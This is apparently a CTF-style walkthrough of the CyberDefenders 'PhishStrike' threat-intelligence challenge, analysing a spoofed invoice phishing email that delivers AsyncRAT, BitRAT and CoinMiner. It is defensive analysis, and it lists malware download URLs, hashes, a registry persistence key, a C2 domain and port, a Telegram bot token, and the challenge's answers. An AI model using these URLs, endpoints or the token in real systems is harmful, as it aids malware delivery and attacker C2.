Post

Threat Intelligence Analysis: PhishStrike — Email Phishing & Multi-Stage Malware Investigation

Threat Intelligence Analysis: PhishStrike — Email Phishing & Multi-Stage Malware Investigation

Platform: CyberDefenders
Challenge: PhishStrike
Category: Threat Intelligence
Difficulty: Medium
Tools: EML Analyzer, URLHaus, URLScan.io, VirusTotal, MalwareBazaar, VMRay, Tria.ge
Achievement: Proof of Completion

1. Executive Summary

Incident Type: Phishing / Multi-Stage Malware Delivery

Malware Families Identified: AsyncRAT, BitRAT, CoinMiner

This investigation analyzes a phishing email targeting faculty members at an educational institution. The email claims a $625,000 purchase and provides a link to download an invoice. Through threat intelligence analysis, we trace the attack chain from initial email delivery through malware distribution, identifying three distinct malware families being delivered from a single malicious server. The investigation maps the attack to the MITRE ATT&CK framework and extracts actionable Indicators of Compromise (IOCs).

MITRE ATT&CK Mapping Overview

TacticTechniqueID
Initial AccessSpearphishing LinkT1566.002
ExecutionUser Execution: Malicious FileT1204.002
PersistenceRegistry Run KeysT1547.001
Defense EvasionObfuscated Files or InformationT1027
Command and ControlApplication Layer Protocol: Web ProtocolsT1071.001
Command and ControlExfiltration Over C2 ChannelT1041
ImpactResource Hijacking (Cryptomining)T1496

2. Phase 1: Email Header Analysis (Questions 1 & 2)

Objective: Identify the source of the phishing email and analyze authentication failures.

Initial Triage

The investigation began with an .eml file analyzed using the EML Analyzer tool. The email presents itself as a “Commercial Purchase Receipt” claiming a $625,000 purchase (Ref. 00034958), designed to create urgency and compel the victim to click the malicious link.

EML Analyzer Email Overview

Email Authentication Analysis

Examining the security headers reveals critical authentication failures:

EML Analyzer Security Headers

Key Findings:

AuthenticationResultImplication
SPFsoftfailSender IP not authorized by domain’s SPF record
DKIMfailEmail signature verification failed
DMARCLikely failingDue to SPF and DKIM failures

The combination of SPF softfail and DKIM fail indicates the email is spoofed—the attacker is impersonating a legitimate sender (erikajohana.lopez@uptc.edu.co) without proper authorization.

MITRE ATT&CK Reference:
This attack leverages T1566.002 - Spearphishing Link, where adversaries send emails with embedded malicious links rather than attachments. The email authentication failures are key indicators of spoofing attempts.

Question 1: Sender IP with SPF softfail and DKIM fail

From the authentication-results header, the sender’s IP address that has an SPF value of softfail and DKIM value of fail is:

Answer: 18.208.22.104

Question 2: Return Path

The Return-Path header specifies where bounce messages should be sent. In this case, it matches the spoofed sender address:

Answer: erikajohana.lopez@uptc.edu.co


3. Phase 2: Malicious URL Identification (Question 3)

Objective: Identify the malware distribution server.

URL Extraction

The EML Analyzer extracts embedded URLs from the email body, revealing the malicious payload delivery infrastructure:

EML Analyzer Extracted URLs

Malicious URL Identified: http://107.175.247.199/loader/install.exe

This URL points directly to an executable file on a server at IP 107.175.247.199, a classic indicator of malware delivery. The use of an IP address rather than a domain name is a common evasion technique to avoid DNS-based blocklists.

Analyst Note:
The path /loader/install.exe suggests this server is part of a malware distribution infrastructure designed to “load” or install malware on victim systems. The use of generic names like “install.exe” is a social engineering tactic to appear legitimate.

Question 3: Malicious File Hosting Server

The IP address of the server hosting the malicious file is:

Answer: 107.175.247.199


4. Phase 3: Malware Family Identification (Questions 4 & 5)

Objective: Identify malware families delivered from the malicious URL and analyze their capabilities.

URLHaus Analysis

Querying the malicious URL in URLHaus reveals it has been flagged for malware distribution:

URLHaus Payload Delivery

URLHaus Intelligence:

FieldValue
URLhttp://107.175.247.199/loader/install.exe
StatusOffline (Taken down)
Threat TypeMalware Download
Date Added2022-10-22 12:39:04 UTC
Takedown Time~1 month, 20 days
TagsAsyncRAT, BitRAT, CoinMiner

The server delivered three distinct malware families:

  1. AsyncRAT - Remote Access Trojan with extensive surveillance capabilities
  2. BitRAT - Remote Access Trojan with persistence mechanisms
  3. CoinMiner - Cryptocurrency mining malware for resource hijacking

CoinMiner Analysis with VirusTotal

The CoinMiner sample SHA-256 hash from URLHaus is: 453fb1c4b3b48361fa8a67dcedf1eaec39449cb5a146a7770c63d1dc0d7562f0

Analyzing this hash in VirusTotal reveals additional network communication:

VirusTotal CoinMiner Relations

The malware communicates with a secondary URL to retrieve additional payloads:

Question 4: Cryptocurrency Mining Malware Family

The malware family responsible for cryptocurrency mining is:

Answer: CoinMiner

MITRE ATT&CK Reference:
CoinMiner malware performs T1496 - Resource Hijacking, exploiting victim system resources (CPU/GPU) for cryptocurrency mining, directly impacting system performance and increasing electricity costs.

Question 5: CoinMiner Requested URL

The CoinMiner malware requests the following URL for additional payload delivery:

Answer: http://ripley.studio/loader/uploads/Qanjttrbv.jpeg

Analysis: The use of a .jpeg extension for what is likely a malicious payload is an example of T1036.008 - Masquerading: File Extension Hiding, where attackers disguise executable content with benign file extensions.


5. Phase 4: BitRAT Persistence Analysis (Questions 6 & 7)

Objective: Analyze BitRAT’s persistence mechanisms and registry modifications.

BitRAT Static Analysis

The BitRAT sample SHA-256 hash from URLHaus is: bf7628695c2df7a3020034a065397592a1f8850e59f9a448b555bc1c8c639539

Analyzing this hash in VirusTotal provides detailed behavioral analysis:

VirusTotal BitRAT Registry Summary

Registry Persistence Mechanism

The malware establishes persistence by modifying the Windows Registry auto-run key:

VirusTotal BitRAT Registry Autorun

Registry Key Modified:

1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Jzwvix

Value: C:\Users\user\AppData\Roaming\Ozndcoodb\Jzwvix.exe

This registry modification ensures the malware executable runs automatically when the user logs in, establishing persistent access to the compromised system.

MITRE ATT&CK Reference:
This is a textbook example of T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder. Adversaries add entries to these registry locations to ensure their malware executes every time the system boots or the user logs on.

Question 6: Registry Auto-run Executable Name

The name of the executable added to the first registry auto-run key is:

Answer: Jzwvix.exe

Question 7: BitRAT SHA-256 Hash

The SHA-256 hash of the file downloaded and added to the autorun keys is the same hash we identified from URLHaus:

Answer: bf7628695c2df7a3020034a065397592a1f8850e59f9a448b555bc1c8c639539


6. Phase 5: BitRAT Network Analysis (Questions 8 & 9)

Objective: Analyze BitRAT’s network communication patterns and evasion techniques.

HTTP Request Analysis

Examining the network traffic generated by BitRAT in VirusTotal’s behavior section:

VirusTotal BitRAT Network Requests

Observed HTTP Requests:

RequestURLStatus
GEThttp://ripley.studio/loader/uploads/Hjvnp.png200
GEThttp://107.175.247.199/loader/server.exe200

The loader first downloads the BitRAT payload (server.exe) from the same malicious IP we identified earlier.

Question 8: BitRAT Loader URL

The URL used by the loader to retrieve the BitRAT malware is:

Answer: http://107.175.247.199/loader/server.exe

Process Execution Analysis

Examining the process and service actions reveals suspicious PowerShell activity:

VirusTotal BitRAT Process Actions

One of the shell commands uses the -enc flag, indicating Base64-encoded PowerShell commands—a common obfuscation technique to evade detection.

Decoding the Obfuscated Command

Decoding the Base64 payload using CyberChef reveals:

CyberChef Base64 Decode

Decoded Command: Start-Sleep -Seconds 50

This sleep command introduces a 50-second delay before continuing execution. This is a common anti-analysis technique:

  • Sandbox Evasion: Many automated sandboxes have timeout limits; delaying execution may cause the sandbox to terminate before malicious behavior occurs
  • Detection Evasion: Separating initial execution from malicious activity can help evade behavioral detection

MITRE ATT&CK Reference:
This technique maps to T1027 - Obfuscated Files or Information (Base64 encoding) and T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion (sleep delay).

Question 9: PowerShell Delay

The delay caused by the PowerShell command is:

Answer: 50


7. Phase 6: Command and Control Infrastructure (Question 10)

Objective: Identify the C2 domain used by BitRAT.

Community Intelligence

VirusTotal’s community comments often provide valuable threat intelligence from other researchers:

VirusTotal BitRAT C2 Comment

Community Analysis Reveals:

FieldValue
Filename86c57967785fe8dbcdf209fb564f9a85.exe
Threat Score10/10
FamilyBitRAT
C2 Domaingh9st.mywire.org:5005

The use of a dynamic DNS service (mywire.org) is common among threat actors as it allows them to quickly change the IP address behind the domain, maintaining C2 access even if specific IPs are blocked.

Question 10: BitRAT C2 Domain

The C2 domain used by the BitRAT malware is:

Answer: gh9st.mywire.org

Analyst Note:
The C2 domain naming convention “gh9st” (resembling “ghost”) and the port 5005 are useful IOCs for network-based detection. Organizations should monitor for DNS queries to dynamic DNS providers and unusual outbound connections on non-standard ports.


8. Phase 7: AsyncRAT Telegram Exfiltration (Question 11)

Objective: Identify the data exfiltration mechanism used by AsyncRAT.

Tria.ge Sandbox Analysis

The AsyncRAT sample SHA-256 hash from URLHaus is: 5ca468704e7ccb8e1b37c0f7595c54df4e2f4035345b6e442e8bd4e11c58f791

VirusTotal didn’t provide the necessary details, so we pivot to Tria.ge for deeper analysis. The sandbox captures network traffic showing Telegram API communication:

Tria.ge AsyncRAT Telegram Bot

Network Request Details:

1
2
GET https://api.telegram.org/bot5610920260:AAHF8huJMzSwUso7E5WSzQW0Bzo4GdubP4k/getUpdates?offset=-5 HTTP/1.1
Host: api.telegram.org

Analysis:

The malware uses a Telegram Bot for C2 communication and data exfiltration. This technique has several advantages for attackers:

  1. Encryption: Telegram API communication is encrypted, making content inspection difficult
  2. Legitimacy: Telegram traffic appears legitimate and may not be blocked by corporate firewalls
  3. Resilience: No need to maintain custom C2 infrastructure
  4. Anonymity: Bot tokens can be easily rotated if detected

MITRE ATT&CK Reference:
This technique maps to:

  • T1071.001 - Application Layer Protocol: Web Protocols (HTTPS to api.telegram.org)
  • T1102.002 - Web Service: Bidirectional Communication (Using Telegram as C2)
  • T1041 - Exfiltration Over C2 Channel (Data exfiltration via the same Telegram channel)

Question 11: AsyncRAT Telegram Bot ID

The Telegram Bot ID used by AsyncRAT for exfiltration is:

Answer: bot5610920260


9. Indicators of Compromise (IOCs)

Network IOCs

IndicatorTypeDescription
18.208.22.104IP AddressEmail sender IP (SPF softfail/DKIM fail)
107.175.247.199IP AddressMalware distribution server
http://107.175.247.199/loader/install.exeURLInitial malware payload
http://107.175.247.199/loader/server.exeURLBitRAT loader
http://ripley.studio/loader/uploads/Qanjttrbv.jpegURLCoinMiner secondary payload
http://ripley.studio/loader/uploads/Hjvnp.pngURLBitRAT secondary payload
gh9st.mywire.org:5005Domain:PortBitRAT C2
api.telegram.orgDomainAsyncRAT exfiltration endpoint
bot5610920260Telegram Bot IDAsyncRAT C2 identifier

File IOCs

SHA-256 HashMalware Family
453fb1c4b3b48361fa8a67dcedf1eaec39449cb5a146a7770c63d1dc0d7562f0CoinMiner
bf7628695c2df7a3020034a065397592a1f8850e59f9a448b555bc1c8c639539BitRAT
5ca468704e7ccb8e1b37c0f7595c54df4e2f4035345b6e442e8bd4e11c58f791AsyncRAT

Host IOCs

IndicatorTypeDescription
Jzwvix.exeFilenameBitRAT persistence executable
C:\Users\*\AppData\Roaming\Ozndcoodb\Jzwvix.exeFile PathBitRAT installation path
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\JzwvixRegistry KeyBitRAT persistence mechanism

Email IOCs

IndicatorTypeDescription
erikajohana.lopez@uptc.edu.coEmail AddressSpoofed sender / Return-Path
SPF softfail + DKIM failAuthentication FailureSpoofing indicator

10. Conclusion

The PhishStrike investigation demonstrates a sophisticated multi-stage attack chain targeting educational institutions:

  1. Initial Access: Phishing email spoofing a legitimate sender with SPF softfail and DKIM fail, containing a malicious link disguised as an invoice.

  2. Multi-Malware Delivery: A single malicious server (107.175.247.199) delivers three distinct malware families:
    • CoinMiner for cryptocurrency mining (Resource Hijacking)
    • BitRAT for remote access with registry-based persistence
    • AsyncRAT for remote access with Telegram-based C2
  3. Persistence: BitRAT establishes persistence via registry Run keys, ensuring execution on every user login.

  4. Evasion: Base64-encoded PowerShell with 50-second sleep delays to evade sandbox analysis.

  5. C2 Diversity: Multiple C2 channels including:
    • Traditional domain-based C2 (gh9st.mywire.org)
    • Telegram Bot API for encrypted exfiltration

Analysis Date: January 18, 2026
Analyst: El OMARI Zakaria

This post is licensed under CC BY 4.0 by the author.